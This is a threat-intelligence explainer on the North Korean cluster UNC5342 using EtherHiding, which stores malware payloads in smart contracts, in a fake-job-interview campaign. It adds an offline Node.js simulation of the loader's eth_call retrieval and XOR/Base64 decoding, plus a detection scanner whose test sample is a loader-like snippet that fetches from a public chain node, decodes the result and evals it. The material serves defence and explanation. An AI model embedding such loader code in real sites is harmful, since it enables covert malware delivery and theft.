TL;DR

Google Threat Intelligence Group reports that the DPRK-linked threat cluster UNC5342 has been using EtherHiding since February 2025 to deliver malware and steal cryptocurrency. The technique stores JavaScript payloads in smart contracts on public chains like Ethereum and BNB Smart Chain, which malicious loaders retrieve via read-only calls.

What happened

Google Threat Intelligence Group (GTIG) has observed North Korean operators tracked as UNC5342 incorporate a technique called EtherHiding into an ongoing social-engineering campaign tracked since February 2025. In this campaign, referred to by industry as 'Contagious Interview', attackers use fake recruitment interactions to trick developers into running malicious code. Compromised sites (often WordPress installations accessed through vulnerabilities or stolen credentials) are injected with a small JavaScript loader. When a victim visits, the loader makes read-only calls to smart contracts on networks such as BNB Smart Chain and Ethereum to fetch Base64-encoded, XOR-encrypted JavaScript payloads. These loaders, associated with the JADESNOW family, decode and decrypt the payload and execute further stages, which commonly deliver the INVISIBLEFERRET backdoor for persistent access and credential theft. GTIG notes this is the first time it has observed a nation-state actor adopting EtherHiding, a method that uses public blockchains as resilient, hard-to-take-down payload repositories.

Why it matters

  • Storing malicious payloads in smart contracts removes a central server to take down, increasing operational resilience for attackers.
  • Read-only calls such as eth_call are not transactions, so payload retrieval leaves no on-chain record; fetches are stealthier and harder to trace than downloads from a conventional command-and-control server.
  • The operator can update the payload by changing the data the contract stores (a single on-chain transaction on the attacker's side), so malware can be swapped or tactics changed without touching the compromised websites.
  • The campaign targets developers and cryptocurrency-related professionals, aligning theft and espionage objectives with potential sanctions-evasion incentives.

Key facts

  • GTIG observed UNC5342 using EtherHiding beginning in February 2025.
  • EtherHiding first emerged publicly in September 2023 in the financially motivated CLEARFAKE campaign (UNC5142).
  • UNC5342’s campaign is tracked as 'Contagious Interview' by industry, leveraging fake job offers and technical interview tasks to lure victims.
  • Attackers compromise legitimate websites, often WordPress sites, via vulnerabilities or stolen credentials and inject a JavaScript loader.
  • Loaders retrieve malicious JavaScript payloads from smart contracts on public chains such as BNB Smart Chain and Ethereum using read-only calls (e.g., eth_call).
  • JADESNOW is the JavaScript downloader used by UNC5342 to fetch, decrypt (Base64 and XOR), and execute payloads stored in smart contracts.
  • The infection chain frequently culminates in INVISIBLEFERRET, a Python-based backdoor used for persistent access, espionage, and data theft.
  • Actors employ elaborate social-engineering tactics including fake recruiters, fabricated company sites, and communications on Telegram or Discord.
  • Malicious packages in some variations are hosted on registries like npm and delivered as part of technical test materials or deceptive update prompts.
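The retrieval path described under "What happened" and in the key facts above, as an added example that is not code from GTIG or from the campaign: a Node.js simulation of the loader side. The contract address, the 4-byte function selector, the XOR key and the stage-2 string are placeholders made up for this example; the RPC node is an in-memory stub so nothing touches a real chain, and the recovered payload is returned rather than executed.

```javascript
// Added example (not from the GTIG report): EtherHiding retrieval, simulated offline.
// Node.js (uses Buffer). The "contract" is an in-memory stub; the decoded payload
// is returned, never executed.

// ---- ABI helpers for a Solidity `string` return value ----
function hexToBytes(hex) {
  const h = hex.startsWith("0x") ? hex.slice(2) : hex;
  return Buffer.from(h, "hex");
}
function pad32(buf) {
  const rem = buf.length % 32;
  return rem === 0 ? buf : Buffer.concat([buf, Buffer.alloc(32 - rem)]);
}
function uint256(n) {
  const b = Buffer.alloc(32);
  b.writeUInt32BE(n, 28); // values in this example fit in 32 bits
  return b;
}
// Layout a view function returning `string` produces: [offset=0x20][length][data padded to 32]
function encodeAbiString(s) {
  const data = Buffer.from(s, "utf8");
  return "0x" + Buffer.concat([uint256(32), uint256(data.length), pad32(data)]).toString("hex");
}
// Inverse of the above, as a loader must do before it can use the returned bytes.
function decodeAbiString(hex) {
  const b = hexToBytes(hex);
  const offset = b.readUInt32BE(28);
  const length = b.readUInt32BE(offset + 28);
  return b.subarray(offset + 32, offset + 32 + length).toString("utf8");
}

// ---- Payload obfuscation as the page describes: XOR with a repeating key, then Base64 ----
function xorBytes(buf, key) {
  const k = Buffer.from(key, "utf8");
  const out = Buffer.alloc(buf.length);
  for (let i = 0; i < buf.length; i++) out[i] = buf[i] ^ k[i % k.length];
  return out;
}
function obfuscate(plaintext, key) {
  return xorBytes(Buffer.from(plaintext, "utf8"), key).toString("base64");
}
function deobfuscate(b64, key) {
  return xorBytes(Buffer.from(b64, "base64"), key).toString("utf8");
}

// ---- The JSON-RPC request a loader sends. eth_call is not a transaction:
// nothing is written to the chain and no gas is spent. ----
function buildEthCall(contractAddress, selector) {
  return {
    jsonrpc: "2.0",
    id: 1,
    method: "eth_call",
    params: [{ to: contractAddress, data: selector }, "latest"],
  };
}

// ---- Constructed sample values (placeholders, not real indicators) ----
const CONTRACT = "0x" + "ab".repeat(20); // hypothetical contract address
const SELECTOR = "0x12345678";           // hypothetical 4-byte function selector
const KEY = "k3y";                       // hypothetical XOR key
const STAGE2 = "console.log('stage-2 placeholder')"; // benign stand-in for staged JS

// What the operator would store in the contract
const storedOnChain = encodeAbiString(obfuscate(STAGE2, KEY));

// Stub RPC node: answers an eth_call for CONTRACT with the stored value, "0x" otherwise
function fakeRpc(request) {
  if (request.method !== "eth_call") throw new Error("unexpected method");
  const { to } = request.params[0];
  return { jsonrpc: "2.0", id: request.id, result: to === CONTRACT ? storedOnChain : "0x" };
}

// Loader side: build request -> result -> ABI-decode -> Base64 -> XOR.
// A real loader would hand the string to eval/Function; this returns it instead.
// An empty result ("0x", e.g. wrong address or no code at that address) yields null.
function retrieveStage(contract, selector, key) {
  const res = fakeRpc(buildEthCall(contract, selector));
  if (!res.result || res.result === "0x") return null;
  return deobfuscate(decodeAbiString(res.result), key);
}

console.log(JSON.stringify(buildEthCall(CONTRACT, SELECTOR)));
console.log(retrieveStage(CONTRACT, SELECTOR, KEY));
```

The request object printed first is exactly what a network sensor would see on the wire (over HTTPS to an RPC provider), which is why the retrieval is invisible on-chain but still visible as an outbound POST from a web page that otherwise has no reason to speak JSON-RPC.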

What to watch next

  • Monitoring for further industry reporting that other nation-state groups adopt EtherHiding: not confirmed in the source.
  • Increased attention to fake recruitment lures, fabricated company pages, and technical interview scams targeting developers.
  • Signals of malicious smart contracts hosting encoded payloads on public chains and anomalous read-only contract queries: not confirmed in the source.
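One way to turn the last watch item into a concrete check, as an added example that is not from the GTIG report: a heuristic scanner over the HTML/JS a site serves, run here on three constructed snippets. The indicator list and weights are assumptions drawn from the technique as this page describes it; the contract addresses are placeholders and the public RPC hostname in the loader-like sample is illustrative only.

```javascript
// Added example (not from the GTIG report): heuristic scan of served page/script
// content for an EtherHiding-style loader. Node.js, offline, constructed samples.

// Indicators are assumptions derived from the technique as described on this page:
// a JSON-RPC eth_call, a contract address, Base64 decoding, an XOR decryption loop,
// and dynamic execution of the result. Weights are arbitrary tuning values.
const INDICATORS = [
  { name: "eth_call JSON-RPC", re: /["']eth_call["']/, weight: 3 },
  { name: "contract address", re: /\b0x[0-9a-fA-F]{40}\b/, weight: 2 },
  { name: "Base64 decode", re: /\batob\s*\(|from\s*\([^)]*["']base64["']\s*\)/, weight: 1 },
  { name: "XOR loop", re: /charCodeAt\s*\([^)]*\)\s*\^|\^\s*\w+\s*\[\s*\w+\s*%/, weight: 2 },
  { name: "dynamic execution", re: /\beval\s*\(|new\s+Function\s*\(/, weight: 2 },
];

// Returns the total weight of matched indicators and their names.
function scanScript(src) {
  const matched = INDICATORS.filter((ind) => ind.re.test(src));
  return {
    score: matched.reduce((sum, ind) => sum + ind.weight, 0),
    hits: matched.map((ind) => ind.name),
  };
}

// A contract read plus decode-and-execute is the loader pattern; a read alone
// (an ordinary dapp querying a balance) should stay below the threshold.
function isSuspicious(src, threshold = 6) {
  return scanScript(src).score >= threshold;
}

// ---- Constructed samples (placeholders, not real indicators) ----
const FAKE_CONTRACT = "0x" + "ab".repeat(20);
const DAPP_CONTRACT = "0x" + "cd".repeat(20);

// (1) Loader-like snippet: reads a contract, Base64-decodes, XORs, evals.
const LOADER_LIKE =
  'fetch("https://bsc-dataseed.binance.org/",{method:"POST",body:JSON.stringify({' +
  'jsonrpc:"2.0",id:1,method:"eth_call",params:[{to:"' + FAKE_CONTRACT +
  '",data:"0x12345678"},"latest"]})}).then(r=>r.json()).then(j=>{' +
  'const t=atob(j.result.slice(130));let o="";' +
  'for(let i=0;i<t.length;i++)o+=String.fromCharCode(t.charCodeAt(i)^k[i%k.length]);eval(o);});';

// (2) Ordinary dapp: reads an ERC-20 balance with eth_call and displays it.
const DAPP_LIKE =
  'fetch(RPC,{method:"POST",body:JSON.stringify({jsonrpc:"2.0",id:1,method:"eth_call",' +
  'params:[{to:"' + DAPP_CONTRACT + '",data:"0x70a08231"},"latest"]})})' +
  '.then(r=>r.json()).then(j=>{document.getElementById("bal").textContent=BigInt(j.result).toString();});';

// (3) Unrelated site script.
const BENIGN =
  'document.addEventListener("DOMContentLoaded",()=>{document.querySelector("#menu").classList.add("ready");});';

for (const [label, src] of [["loader-like", LOADER_LIKE], ["dapp-like", DAPP_LIKE], ["benign", BENIGN]]) {
  const r = scanScript(src);
  console.log(label, r.score, r.hits.join(", ") || "(none)", isSuspicious(src) ? "SUSPICIOUS" : "ok");
}
```

Run this over the HTML and script bodies a site actually serves (a fetched copy, not the files on disk, since injected loaders may be added at render time), and treat a hit as a prompt to diff the page against a known-good copy rather than as proof of compromise: the dapp-like sample shows why a contract read by itself must not trip the check.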

Quick glossary

  • EtherHiding: A technique where attackers embed malicious code in smart contracts on public blockchains and retrieve it via read-only calls to avoid conventional takedown.
  • Smart contract: Self-executing code deployed on a blockchain that runs under predefined rules; can store data and respond to calls.
  • eth_call (read-only call): A method to query smart contract data without creating an on-chain transaction or incurring gas fees; does not alter chain state.
  • Backdoor: Malware that provides persistent remote access to a compromised system, enabling data theft, espionage, or further intrusion.
  • Social engineering: Techniques attackers use to manipulate people into divulging information or performing actions that enable compromise.

Reader FAQ

Who is UNC5342?
UNC5342 is a threat cluster GTIG associates with North Korean (DPRK) activity and has been observed using EtherHiding since February 2025.

What is JADESNOW?
JADESNOW is a JavaScript-based downloader used by UNC5342 to fetch, decrypt, and execute payloads stored in smart contracts.

Which blockchains are being used for EtherHiding?
GTIG observed deployments on Ethereum and BNB Smart Chain; broader use across other chains is not confirmed in the source.

Is the use of EtherHiding by nation-state actors widespread?
GTIG reports this as the first observed instance of a nation-state actor using EtherHiding; wider adoption is not confirmed in the source.

Written by: Blas Kojusner, Robert Wallace, Joseph Dobson Google Threat Intelligence Group (GTIG) has observed the North Korea (DPRK) threat actor UNC5342 using ‘EtherHiding’ to deliver malware and facilitate cryptocurrency…